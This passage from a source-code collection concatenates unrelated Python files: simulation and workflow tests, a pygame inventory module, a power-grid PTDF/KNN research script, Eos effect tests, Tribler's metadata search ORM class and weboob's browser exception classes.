                        {'id': 4, 'promoter_id': 20, 'receptor_id': 5}],
             'logics': [17], 'outputs': [1]}
        ], 'toggle_switch_1')

    def test_preprocess_toggle_switch_2(self):
        self._assert_preprocess([
            {'inputs': [{'id': 4, 'promoter_id': 20, 'receptor_id': 5}],
             'logics': [18], 'outputs': [1, 2]}
        ], 'toggle_switch_2')

    def test_preprocess_inverter(self):
        self._assert_preprocess([
            {'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
             'logics': [7], 'outputs': [1]}
        ], 'inverter')

    def test_preprocess_simple(self):
        self._assert_preprocess([
            {'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
             'logics': [20], 'outputs': [1]}
        ], 'simple')

    def test_preprocess_and_gate(self):
        self._assert_preprocess([
            {'inputs': [{'id': 8, 'promoter_id': 1, 'receptor_id': 12},
                        {'id': 9, 'promoter_id': 17, 'receptor_id': 13}],
             'logics': [21], 'outputs': [1]}
        ], 'and_gate')

    def test_preprocess_or_gate(self):
        self._assert_preprocess([
            {'inputs': [{'id': 8, 'promoter_id': 1, 'receptor_id': 12},
                        {'id': 9, 'promoter_id': 17, 'receptor_id': 13}],
             'logics': [23], 'outputs': [1]}
        ], 'or_gate')
class TestSimulationSimulate(TestSimulationBase):
    """Tests for the /simulation/simulate/{dynamic,static} endpoints."""

    def _assert_simulate(self, mode, logic_type, params, fixture_path):
        """Run one simulation case and compare with its stored fixture.

        Args:
            mode: 'dynamic' or 'static' endpoint suffix.
            logic_type: key into ``self.simulations`` for the base payload.
            params: extra payload fields ('x0' initial concentrations for
                dynamic runs, 'c_static' for static runs).
            fixture_path: JSON file holding the expected response.
        """
        s = self.simulations[logic_type]
        s.update(params)
        s['t'] = 100  # simulation horizon shared by every case
        result = self.client.post('/simulation/simulate/%s' % mode,
                                  data=json.dumps(s)).json
        with open(fixture_path) as fobj:
            desired = json.load(fobj)
        self.assertItemsAlmostEqual(result, desired)

    def test_simulation_dynamic_and_gate(self):
        self._assert_simulate('dynamic', 'and_gate',
                              {'x0': {'Zinc ions': 2e-2, 'PAI': 1e-2}},
                              'tests/simulation_dynamic_and_gate.json')

    def test_simulation_dynamic_simple(self):
        self._assert_simulate('dynamic', 'simple',
                              {'x0': {'Mercury ions': 1e-2}},
                              'tests/simulation_dynamic_simple.json')

    def test_simulation_dynamic_toggle_switch_1(self):
        self._assert_simulate('dynamic', 'toggle_switch_1',
                              {'x0': {'Arsenic ions': 1e-2, 'aTc': 2e-2}},
                              'tests/simulation_dynamic_toggle_switch_1.json')

    def test_simulation_static_and_gate(self):
        self._assert_simulate('static', 'and_gate',
                              {'c_static': 1.0},
                              'tests/simulation_static_and_gate.json')

    def test_simulation_static_simple(self):
        self._assert_simulate('static', 'simple',
                              {'c_static': 1.0},
                              'tests/simulation_static_simple.json')

    def test_simulation_static_toggle_switch_1(self):
        self._assert_simulate('static', 'toggle_switch_1',
                              {'c_static': 1.0},
                              'tests/simulation_static_toggle_switch_1.json')
|
knipknap/SpiffWorkflow
|
tests/SpiffWorkflow/dmn/KwargsParameterTest.py
|
import unittest
from tests.SpiffWorkflow.dmn.DecisionRunner import DecisionRunner
class StringDecisionTestClass(unittest.TestCase):
    """
    Checks that DecisionRunner accepts decision inputs passed as plain
    keyword arguments (here 'Gender').

    Doc: https://docs.camunda.org/manual/7.7/user-guide/dmn-engine/
    """
    @classmethod
    def setUpClass(cls):
        # One shared runner for the whole class; 'DEBUG' enables verbose
        # output from the DMN parser.
        cls.runner = DecisionRunner('kwargs_parameter.dmn', debug='DEBUG')
    def test_string_decision_string_output1(self):
        # 'Gender' is forwarded as a keyword parameter to the decision table.
        res = self.runner.decide(Gender='m')
        self.assertEqual(res.description, 'm Row Annotation')
def suite():
    """Build the unittest suite containing this module's test case."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromTestCase(StringDecisionTestClass)
if __name__ == '__main__':
    # Allow running this test module directly, with verbose output.
    unittest.TextTestRunner(verbosity=2).run(suite())
|
lepovica/Lost-Nero
|
inventory.py
|
import pygame
from vec2d import vec2d
from random import choice
# Catalogue constants used when generating items.
ITEM_TYPES = ['weapon', 'armor', 'flask']
WEAPONS_ID = ['sword', 'axe', 'staff', 'bow']
ARMORS_ID = [
    'chest', 'shoulders', 'shield', 'gloves', 'boots', 'pants', 'mantle',
    'helmet', 'skirt']
FLASKS_ID = ['healt', 'armor']
# Sprite caches, filled at import time by the loop below.
SWORD_IMG = list()
AXES_IMG = list()
STAFF_IMG = list()
BOW_IMG = list()
# Registry of dynamically generated sword Item subclasses
# (populated by Inventory.load_items).
SWORDS = dict()
for i in range(47):
    # NOTE(review): all four weapon lists are loaded from the same
    # 'sw<N>.png' files -- axe/staff/bow sprites look like placeholders;
    # confirm before shipping dedicated art.
    SWORD_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
    AXES_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
    STAFF_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
    BOW_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
class Item(pygame.sprite.Sprite):
    """A collectible game item (weapon, armor or flask) drawn on screen."""

    # Lifecycle states: lying on the ground vs. picked up by the player.
    (DROPPED, GETTED) = range(2)

    def __init__(self, screen, pos, img_file, item_type,
                 price, attack_power, deffence_power, armor, name, level):
        pygame.sprite.Sprite.__init__(self)
        self.pos = vec2d(pos)
        self.screen = screen
        self.base_image = img_file
        self.image = self.base_image
        self.state = self.DROPPED
        self.type = item_type
        self.attack_power = attack_power
        self.deffence_power = deffence_power
        self.armor = armor
        self.price = price
        self.name = name
        self.level_required = level

    def drop(self, pos):
        """Mark the item as lying on the ground."""
        self.state = self.DROPPED

    def get(self):
        """Mark the item as picked up."""
        self.state = self.GETTED

    def draw(self):
        """Blit the item image centred on its current position."""
        width, height = self.image.get_size()
        target_rect = self.image.get_rect().move(
            self.pos.x - width / 2,
            self.pos.y - height / 2)
        self.screen.blit(self.image, target_rect)
class Cell(pygame.sprite.Sprite):
    """A single square slot that can hold one item.

    The cell knows its centre position, an optional stored item and an
    optional background surface to blit behind the item.
    """
    def __init__(self, screen, pos, item = None, background = None):
        pygame.sprite.Sprite.__init__(self)
        self.pos = vec2d(pos)
        self.item = item
        self.screen = screen
        self.background = background
        self.side = 50  # side length of the square cell, in pixels

    def is_empty(self):
        """Return True when no item is stored in this cell."""
        return self.item is None

    def draw(self):
        """Blit the cell background centred on its position.

        Bug fixes vs. the original: the method was missing ``self`` and
        referenced undefined names (``Color``, ``self.image``,
        ``item_rect``), so it could never run.
        """
        if self.background is None:
            # No background surface configured; nothing to draw.
            # NOTE(review): the original tried Color('Black') here, but a
            # Color is not blittable -- confirm the intended fallback.
            return
        width, height = self.background.get_size()
        cell_rect = self.background.get_rect().move(
            self.pos.x - width / 2,
            self.pos.y - height / 2)
        self.screen.blit(self.background, cell_rect)
class Inventory:
    """Player inventory: equipment slots, a quick-access bar and a paged bag."""

    # Equipment slot indices. NOTE(review): the original tuple bound SHIELD
    # twice (positions 1 and 4), leaving slot 1 effectively unnamed; slot 1
    # is now named OFFHAND so every other constant keeps its original value.
    (WEAPON, OFFHAND, CHEST, SHOULDERS, SHIELD, GLOVES,
     BOOTS, PANTS, MANTLE, HELMET, SKIRT,) = range(11)

    def __init__(self, screen, texture):
        self.texture = texture
        self.left_top = vec2d(0, 540)
        self.hight = 60
        self.wide = 600
        self.screen = screen
        # Bag pages are numbered 1..3; index 0 is kept unused so that
        # self.bag[self.bag_pages] is always a valid index (the original
        # `[[]]` raised IndexError on the very first insertion).
        self.bag_pages = 1
        self.bag = [[] for _ in range(4)]
        self.start_pos_bag = vec2d(0, 0)
        # initial of bag
        self.inverntory = list()
        self.start_pos_inventory = vec2d(0, 0)
        # Work on a copy so the stored start position is not mutated.
        slot_pos = vec2d(self.start_pos_inventory)
        for _ in range(11):
            self.inverntory.append(Cell(self.screen, slot_pos))
            slot_pos.x += 60
        self.bar = []
        self.start_pos_bar = vec2d(5, 545)
        bar_pos = vec2d(self.start_pos_bar)
        for _ in range(9):
            self.bar.append(Cell(self.screen, bar_pos))
            bar_pos.x += 60

    def add_item_bag(self, item):
        """Store *item* in the bag, advancing to the next page when the
        current one fills up; silently drops the request when all three
        pages are full.

        Bug fixes vs. the original: the branch logic returned unless the
        page was already full, `append` was misspelled `apeend`, and an
        undefined name `background` was passed to Cell.
        """
        if self.bag_pages > 3:
            return
        if len(self.bag[self.bag_pages]) == 9:
            if self.bag_pages < 3:
                self.bag_pages += 1
            else:
                return  # all three pages are full
        item.state = item.GETTED
        # The cell "position" encodes (page, index-in-page) rather than
        # screen coordinates; remove_item_bag relies on this encoding.
        cell_position = (self.bag_pages, len(self.bag[self.bag_pages]))
        self.bag[self.bag_pages].append(
            Cell(self.screen, cell_position, item))

    def remove_item_bag(self, item):
        """Remove *item* from the bag and mark it as dropped.

        NOTE(review): assumes item.pos holds the (page, index) pair used
        by add_item_bag -- confirm against callers.
        """
        page, index = int(item.pos.x), int(item.pos.y)
        self.bag[page].pop(index)
        item.state = item.DROPPED

    def add_item_inventory(self, pos_inventory, item):
        """Equip *item* into slot *pos_inventory*, sending any previously
        equipped item back to the bag.

        Bug fix vs. the original: the item is stored inside the slot's
        Cell instead of replacing the Cell object in the list, which kept
        is_empty() and draw_inventory() working.
        """
        slot = self.inverntory[pos_inventory]
        if not slot.is_empty():
            self.remove_item_inventory(pos_inventory)
        slot.item = item
        item.state = item.GETTED

    def remove_item_inventory(self, pos_inventory):
        """Unequip the item in slot *pos_inventory*, if any, into the bag."""
        slot = self.inverntory[pos_inventory]
        if slot.item is not None:
            removed_item = slot.item
            slot.item = None
            self.add_item_bag(removed_item)

    def draw(self):
        """Tile the background texture over the inventory panel area."""
        # NOTE(review): get_size() returns (width, height), so step_h is
        # actually the texture width here -- kept as-is to preserve the
        # original tiling; confirm intended.
        step_h, step_w = self.texture.get_size()
        step_h_counter = 0
        step_w_counter = 0
        while step_w_counter <= self.wide:
            while step_h_counter <= self.hight:
                self.screen.blit(self.texture,
                    self.left_top + vec2d(step_w_counter, step_h_counter))
                step_h_counter += step_h
            step_w_counter += step_w
            step_h_counter = 0

    def load_items(self, level=1):
        """Generate an Item subclass for every sword sprite.

        Args:
            level: item level used to scale the generated stats. Bug fix
                vs. the original, which referenced undefined names `i`
                and `level`; `level` is now a parameter defaulting to 1.
        """
        for i, img_file in enumerate(SWORD_IMG, start=1):
            item_name = str(i) + "_sword"
            SWORDS[item_name] = type(item_name, (Item,), {
                'pos' : vec2d(0, 0), 'screen' : self.screen,
                'base_image' : img_file, 'image' : img_file,
                'state' : 0, 'item_type' : ITEM_TYPES[0],
                'level_required' : level,
                'name' : item_name,
                'attack_power' : level*20,
                'deffence_power' : level*5,
                'price' : level*100, 'armor' : level*100 })
        # load more items..

    def draw_inventory(self):
        """Draw every equipment slot and, when present, its item."""
        for cell in self.inverntory:
            cell.draw()
            if cell.item is not None:  # empty slots crashed the original
                cell.item.draw()

    def draw_bar(self):
        """Draw the quick-access bar cells and their items."""
        for cell in self.bar:
            cell.draw()
            if cell.item is not None:
                cell.item.draw()

    def draw_bag(self):
        """Drawing of the bag pages is not implemented yet."""
        pass
|
SanPen/GridCal
|
src/research/ptdf_ts.py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import neighbors
from GridCal.Engine import PowerFlowOptions, FileOpen, SolverType, ReactivePowerControlMode, \
TapsControlMode, BranchImpedanceMode, TimeSeries, PtdfTimeSeries, CDF, LatinHypercubeSampling
def knn_interp(X, Y, perc):
    """Fit a KNN regressor on the first `perc` fraction of the samples and
    predict the remaining tail.

    Args:
        X: feature matrix (samples on the first axis).
        Y: target matrix aligned with X.
        perc: fraction (0..1) of samples to use for training.

    Returns:
        Predictions for the held-out tail X[k_split:].
    """
    k_split = int(X.shape[0] * perc)
    X_train = X[:k_split]
    Y_train = Y[:k_split]
    X_test = X[k_split:]
    Y_test = Y[k_split:]
    n_neighbors = 5
    model = neighbors.KNeighborsRegressor(n_neighbors)
    print('Fitting...')
    model.fit(X_train, Y_train)
    print('Predicting...')
    Y_predict = model.predict(X_test)
    print('Scoring...')
    score = model.score(X_test, Y_test)
    print('Score:', score)
    # Bug fix: the original ended with a bare `Y_predict` expression
    # (a no-op) and implicitly returned None.
    return Y_predict
def run(fname):
    """Compare branch active-power flows computed three ways -- a full
    Newton-Raphson time series, a linear PTDF approximation, and a KNN
    regressor trained on the first 60 snapshots -- and plot branch 10.

    Args:
        fname: path of the GridCal grid file to open.
    """
    circuit = FileOpen(fname).open()
    pf_options = PowerFlowOptions(solver_type=SolverType.NR,
                                  retry_with_other_methods=False,
                                  verbose=False,
                                  initialize_with_existing_solution=False,
                                  tolerance=1e-6,
                                  max_iter=5,
                                  max_outer_loop_iter=10,
                                  control_q=ReactivePowerControlMode.NoControl,
                                  control_taps=TapsControlMode.NoControl,
                                  multi_core=False,
                                  dispatch_storage=False,
                                  control_p=False,
                                  apply_temperature_correction=False,
                                  branch_impedance_tolerance_mode=BranchImpedanceMode.Specified,
                                  q_steepness_factor=30,
                                  distributed_slack=False,
                                  ignore_single_node_islands=False,
                                  correction_parameter=1e-4)
    nc = circuit.compile_time_series()
    # Reference: full power-flow time series.
    ts_driver = TimeSeries(circuit, pf_options)
    ts_driver.run()
    # Linear PTDF approximation of the same series.
    ptdf_driver = PtdfTimeSeries(circuit, pf_options, power_delta=10)
    ptdf_driver.run()
    # Latin-hypercube sampling, same number of points as the time profile.
    npoints = int(len(circuit.time_profile) * 1)
    lhs_driver = LatinHypercubeSampling(circuit, pf_options, sampling_points=npoints)
    lhs_driver.run()
    # Injections (P, Q) and branch flows from each driver.
    P = nc.get_power_injections().real.T
    Q = nc.get_power_injections().imag.T
    Pbr_ts = ts_driver.results.Sbranch.real
    Pbr_ptdf = ptdf_driver.results.Sbranch.real
    P_lhs = lhs_driver.results.S_points.real
    Q_lhs = lhs_driver.results.S_points.imag
    Pbr_lhs = lhs_driver.results.Sbr_points.real
    # KNN
    n_neighbors = 3
    model = neighbors.KNeighborsRegressor(n_neighbors)
    # model.fit(P[:40], Pbr_ts[:40])
    # model.fit(P_lhs, Pbr_lhs) # just the LHS for training
    # X = np.r_[np.c_[P_lhs, Q], np.c_[P, Q]]
    # Y = np.r_[Pbr_lhs, Pbr_ts]
    # Train on the first 60 snapshots of the full time series only.
    X = np.c_[P, Q][:60]
    Y = Pbr_ts[:60]
    model.fit(X, Y) # LHS + TS for training ("dreaming")
    Pbr_knn = model.predict(np.c_[P, Q])
    fig = plt.figure(figsize=(12, 8))
    ax = fig.add_subplot(111)
    i = 10 # branch index
    ax.plot(Pbr_ts[i, :], label='Real flow', linewidth=5, c='orange')
    ax.plot(Pbr_ptdf[i, :], label='PTDF', c='b', linestyle='--')
    ax.plot(Pbr_knn[i, :], label='KNN', c='k', linestyle=':')
    ax.set_xlabel('Time')
    ax.set_ylabel('MW')
    fig.legend()
    plt.show()
if __name__ == '__main__':
    # NOTE(review): hard-coded absolute path to a developer machine;
    # adjust before running elsewhere.
    run(r'/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE_30_new.xlsx')
|
pyfa-org/eos
|
tests/integration/effect_mode/full_compliance/test_overload.py
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos import EffectMode
from eos import ModuleHigh
from eos import State
from eos.const.eve import EffectCategoryId
from tests.integration.effect_mode.testcase import EffectModeTestCase
class TestFullComplianceOverload(EffectModeTestCase):
    """Tests EffectMode.full_compliance for overload-category effects.

    In full compliance mode the effect must run exactly when the item is
    in State.overload: the target attribute reads 12 (base 10 modified by
    the source attribute) while the effect runs, and 10 when it does not.
    """

    def _make_effect_and_item(self, state):
        """Build an overload-category effect and a ModuleHigh carrying it.

        Returns (effect, item); the item is not yet added to the fit and
        its effect mode is left at the default -- callers set it.
        """
        effect = self.mkeffect(
            category_id=EffectCategoryId.overload,
            modifiers=[self.modifier])
        item = ModuleHigh(
            self.mktype(
                attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
                effects=[effect]).id,
            state=state)
        return effect, item

    def _assert_clean(self):
        """Cleanup assertions shared by every test."""
        self.assert_solsys_buffers_empty(self.fit.solar_system)
        self.assert_log_entries(0)

    def test_started_on_add(self):
        effect, item = self._make_effect_and_item(State.overload)
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        # Action
        self.fit.modules.high.append(item)
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
        # Cleanup
        self._assert_clean()

    def test_started_on_state_switch(self):
        effect, item = self._make_effect_and_item(State.active)
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        self.fit.modules.high.append(item)
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
        # Action
        item.state = State.overload
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
        # Cleanup
        self._assert_clean()

    def test_started_on_mode_switch(self):
        effect, item = self._make_effect_and_item(State.overload)
        item.set_effect_mode(effect.id, EffectMode.force_stop)
        self.fit.modules.high.append(item)
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
        # Action
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
        # Cleanup
        self._assert_clean()

    def test_stopped_insufficient_state_on_add(self):
        effect, item = self._make_effect_and_item(State.active)
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        # Action
        self.fit.modules.high.append(item)
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
        # Cleanup
        self._assert_clean()

    def test_stopped_insufficient_state_on_state_switch(self):
        effect, item = self._make_effect_and_item(State.overload)
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        self.fit.modules.high.append(item)
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
        # Action
        item.state = State.active
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
        # Cleanup
        self._assert_clean()

    def test_stopped_insufficient_state_on_mode_switch(self):
        effect, item = self._make_effect_and_item(State.active)
        item.set_effect_mode(effect.id, EffectMode.force_run)
        self.fit.modules.high.append(item)
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
        # Action
        item.set_effect_mode(effect.id, EffectMode.full_compliance)
        # Verification
        self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
        # Cleanup
        self._assert_clean()
|
hbiyik/tribler
|
src/tribler-core/tribler_core/modules/metadata_store/orm_bindings/metadata_node.py
|
import threading
from asyncio import get_event_loop
from pony import orm
from pony.orm import db_session, desc, raw_sql, select
from tribler_core.modules.metadata_store.orm_bindings.channel_node import LEGACY_ENTRY, TODELETE
from tribler_core.modules.metadata_store.orm_bindings.torrent_metadata import NULL_KEY_SUBST
from tribler_core.modules.metadata_store.serialization import METADATA_NODE, MetadataNodePayload
from tribler_core.utilities.unicode import hexlify
def define_binding(db):
    """Define and return the MetadataNode ORM class bound to the given Pony db."""
    class MetadataNode(db.ChannelNode):
        """
        This ORM class extends ChannelNode by adding metadata-storing attributes such as "title" and "tags".
        It implements methods for indexed text search based on the "title" field.
        It is not intended for direct use. Instead, other classes should derive from it.
        """
        _discriminator_ = METADATA_NODE
        # Serializable
        title = orm.Optional(str, default='', index=True)
        tags = orm.Optional(str, default='', index=True)
        # FIXME: ACHTUNG! PONY BUG! This is a workaround for Pony not caching attributes from multiple inheritance!
        # Its real home is CollectionNode, but we are forced to put it here so it is loaded by default on all queries.
        # When Pony fixes it, we must move it back to CollectionNode for clarity.
        num_entries = orm.Optional(int, size=64, default=0, index=True)
        # Special class-level properties
        _payload_class = MetadataNodePayload
        # Positional argument names of the payload constructor, minus `self`;
        # used when (de)serializing this node.
        payload_arguments = _payload_class.__init__.__code__.co_varnames[
            : _payload_class.__init__.__code__.co_argcount
        ][1:]
        nonpersonal_attributes = db.ChannelNode.nonpersonal_attributes + ('title', 'tags')
        @classmethod
        def search_keyword(cls, query, lim=100):
            """Full-text search on titles; returns a Pony query of matches."""
            # Requires FTS5 table "FtsIndex" to be generated and populated.
            # FTS table is maintained automatically by SQL triggers.
            # BM25 ranking is embedded in FTS5.
            # Sanitize FTS query
            if not query or query == "*":
                return []
            # !!! FIXME !!! Fix GROUP BY for entries without infohash !!!
            # TODO: optimize this query by removing unnecessary select nests (including Pony-manages selects)
            fts_ids = raw_sql(
                """SELECT rowid FROM ChannelNode WHERE rowid IN (SELECT rowid FROM FtsIndex WHERE FtsIndex MATCH $query
                ORDER BY bm25(FtsIndex) LIMIT $lim) GROUP BY infohash"""
            )
            return cls.select(lambda g: g.rowid in fts_ids)
        @classmethod
        @db_session
        def get_entries_query(
            cls,
            metadata_type=None,
            channel_pk=None,
            exclude_deleted=False,
            hide_xxx=False,
            exclude_legacy=False,
            origin_id=None,
            sort_by=None,
            sort_desc=True,
            txt_filter=None,
            subscribed=None,
            category=None,
            attribute_ranges=None,
            id_=None,
        ):
            """
            This method implements REST-friendly way to get entries from the database. It is overloaded by the higher
            level classes to add some more conditions to the query.
            :return: PonyORM query object corresponding to the given params.
            """
            # Warning! For Pony magic to work, iteration variable name (e.g. 'g') should be the same everywhere!
            pony_query = cls.search_keyword(txt_filter, lim=1000) if txt_filter else select(g for g in cls)
            # metadata_type may be a single value or an iterable of values;
            # the TypeError from `in` on a non-iterable selects the == form.
            if metadata_type is not None:
                try:
                    pony_query = pony_query.where(lambda g: g.metadata_type in metadata_type)
                except TypeError:
                    pony_query = pony_query.where(lambda g: g.metadata_type == metadata_type)
            pony_query = (
                pony_query.where(public_key=(b"" if channel_pk == NULL_KEY_SUBST else channel_pk))
                if channel_pk is not None
                else pony_query
            )
            if attribute_ranges is not None:
                for attr, left, right in attribute_ranges:
                    getattr(cls, attr)  # Check against code injection
                    # Pony resolves `left`/`right` in these filter strings
                    # from the enclosing Python scope.
                    if left is not None:
                        pony_query = pony_query.where(f"g.{attr} >= left")
                    if right is not None:
                        pony_query = pony_query.where(f"g.{attr} < right")
            # origin_id can be zero, for e.g. root channel
            pony_query = pony_query.where(id_=id_) if id_ is not None else pony_query
            pony_query = pony_query.where(origin_id=origin_id) if origin_id is not None else pony_query
            # NOTE(review): subscribed=False behaves the same as
            # subscribed=True here (the lambda only tests truthiness of
            # g.subscribed) -- confirm this is intended.
            pony_query = pony_query.where(lambda g: g.subscribed) if subscribed is not None else pony_query
            pony_query = pony_query.where(lambda g: g.tags == category) if category else pony_query
            pony_query = pony_query.where(lambda g: g.status != TODELETE) if exclude_deleted else pony_query
            pony_query = pony_query.where(lambda g: g.xxx == 0) if hide_xxx else pony_query
            pony_query = pony_query.where(lambda g: g.status != LEGACY_ENTRY) if exclude_legacy else pony_query
            # Sort the query
            if sort_by == "HEALTH":
                pony_query = (
                    pony_query.sort_by("(desc(g.health.seeders), desc(g.health.leechers))")
                    if sort_desc
                    else pony_query.sort_by("(g.health.seeders, g.health.leechers)")
                )
            elif sort_by == "size" and not issubclass(cls, db.ChannelMetadata):
                # TODO: optimize this check to skip cases where size field does not matter
                # When querying for mixed channels / torrents lists, channels should have priority over torrents
                sort_expression = "desc(g.num_entries), desc(g.size)" if sort_desc else "g.num_entries, g.size"
                pony_query = pony_query.sort_by(sort_expression)
            elif sort_by:
                sort_expression = "g." + sort_by
                sort_expression = desc(sort_expression) if sort_desc else sort_expression
                pony_query = pony_query.sort_by(sort_expression)
            return pony_query
        @classmethod
        async def get_entries_threaded(cls, **kwargs):
            """Run get_entries in a thread-pool executor (non-blocking)."""
            def _get_results():
                result = cls.get_entries(**kwargs)
                # Pony keeps per-thread connections; drop the one opened by
                # the worker thread so it does not leak.
                if not isinstance(threading.current_thread(), threading._MainThread):
                    db.disconnect()
                return result
            return await get_event_loop().run_in_executor(None, _get_results)
        @classmethod
        @db_session
        def get_entries(cls, first=1, last=None, **kwargs):
            """
            Get some torrents. Optionally sort the results by a specific field, or filter the channels based
            on a keyword/whether you are subscribed to it.
            :return: A list of class members
            """
            pony_query = cls.get_entries_query(**kwargs)
            # Pagination: `first` is 1-based and inclusive.
            return pony_query[(first or 1) - 1 : last]
        @classmethod
        @db_session
        def get_total_count(cls, **kwargs):
            """
            Get total count of torrents that would be returned if there would be no pagination/limits/sort
            """
            for p in ["first", "last", "sort_by", "sort_desc"]:
                kwargs.pop(p, None)
            return cls.get_entries_query(**kwargs).count()
        @classmethod
        @db_session
        def get_entries_count(cls, **kwargs):
            # Same as get_total_count but keeps sort parameters.
            for p in ["first", "last"]:
                kwargs.pop(p, None)
            return cls.get_entries_query(**kwargs).count()
        @classmethod
        def get_auto_complete_terms(cls, keyword, max_terms, limit=10):
            """Suggest completion terms for *keyword* based on stored titles."""
            if not keyword:
                return []
            with db_session:
                # Quoted phrase + '*' = FTS prefix search on the keyword.
                result = cls.search_keyword("\"" + keyword + "\"*", lim=limit)[:]
                titles = [g.title.lower() for g in result]
            # Copy-pasted from the old DBHandler (almost) completely
            all_terms = set()
            for line in titles:
                if len(all_terms) >= max_terms:
                    break
                # Extract the word starting at the keyword up to the next space.
                i1 = line.find(keyword)
                i2 = line.find(' ', i1 + len(keyword))
                term = line[i1:i2] if i2 >= 0 else line[i1:]
                if term != keyword:
                    all_terms.add(term)
            return list(all_terms)
        def to_simple_dict(self):
            """
            Return a basic dictionary with information about the channel.
            """
            simple_dict = {
                "type": self._discriminator_,
                "id": self.id_,
                "origin_id": self.origin_id,
                "public_key": hexlify(self.public_key),
                "name": self.title,
                "category": self.tags,
                "status": self.status,
            }
            return simple_dict
    return MetadataNode
|
laurentb/weboob
|
weboob/exceptions.py
|
# -*- coding: utf-8 -*-
# Copyright(C) 2014 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.misc import to_unicode
from weboob.tools.compat import StrConv
class BrowserIncorrectPassword(Exception):
    """The site rejected the supplied credentials."""
    pass
class BrowserForbidden(Exception):
    """The site refuses access to the requested resource."""
    pass
class BrowserBanned(BrowserIncorrectPassword):
    """The account has been banned (stronger form of incorrect password)."""
    pass
class BrowserUnavailable(Exception):
    """The site is temporarily unreachable or malfunctioning."""
    pass
class BrowserInteraction(Exception):
    """Base class for errors that require interaction with the user."""
    pass
class BrowserQuestion(BrowserInteraction, StrConv):
    """
    When raised by a browser, signals that additional information must be
    asked of the user (e.g. an OTP code); the requested value fields are
    stored in ``self.fields``.
    """
    def __init__(self, *fields):
        # Each field is expected to expose id, label and description
        # attributes (used by __str__/__unicode__ below).
        self.fields = fields
    def __str__(self):
        return ", ".join("{}: {}".format(
            field.id or field.label, field.description) for field in self.fields
        )
    def __unicode__(self):
        # Python 2 counterpart of __str__, forcing unicode conversion.
        return ", ".join(
            u"{}: {}".format(
                to_unicode(field.id) or to_unicode(field.label),
                to_unicode(field.description)
            ) for field in self.fields
        )
class DecoupledValidation(BrowserInteraction):
    """The user must validate the operation out-of-band (e.g. on a device)."""
    def __init__(self, message='', resource=None, *values):
        super(DecoupledValidation, self).__init__(*values)
        self.message = message
        # Resource (e.g. a transfer) whose processing awaits the validation.
        self.resource = resource
    def __str__(self):
        return self.message
class AppValidation(DecoupledValidation):
    """Validation must be confirmed in the provider's mobile application."""
    pass
class AppValidationError(Exception):
    """Base class for app-validation failures."""
    pass
class AppValidationCancelled(AppValidationError):
    """The user cancelled the app validation."""
    pass
class AppValidationExpired(AppValidationError):
    """The app validation timed out before the user confirmed it."""
    pass
class BrowserRedirect(BrowserInteraction):
    """The user must be redirected to an external URL to continue."""
    def __init__(self, url, resource=None):
        self.url = url
        # Needed for transfer redirection
        self.resource = resource
    def __str__(self):
        return 'Redirecting to %s' % self.url
class CaptchaQuestion(Exception):
    """Base class raised when a site requires solving a CAPTCHA.

    Extra keyword arguments are stored as attributes on the exception so
    callers can retrieve challenge-specific data (site key, image data...).
    """
    # could be improved to pass the name of the backendconfig key
    def __init__(self, type=None, **kwargs):
        super(CaptchaQuestion, self).__init__("The site requires solving a captcha")
        self.type = type
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
class WrongCaptchaResponse(Exception):
    """Raised when the website reports the captcha response as wrong."""
    def __init__(self, message=None):
        if not message:
            # Same fallback as `message or ...`: empty strings also get it.
            message = "Captcha response is wrong"
        super(WrongCaptchaResponse, self).__init__(message)
class ImageCaptchaQuestion(CaptchaQuestion):
type = 'image_captcha'
image_data = None
def __init__(self, image_data):
super(ImageCaptchaQuestion, self).__init__(self.type, image_data=image_data)
class NocaptchaQuestion(CaptchaQuestion):
type = 'g_recaptcha'
website_key = None
website_url = None
def __init__(self, website_key, website_url):
super(NocaptchaQuestion, self).__init__(self.type, website_key=website_key, website_url=website_url)
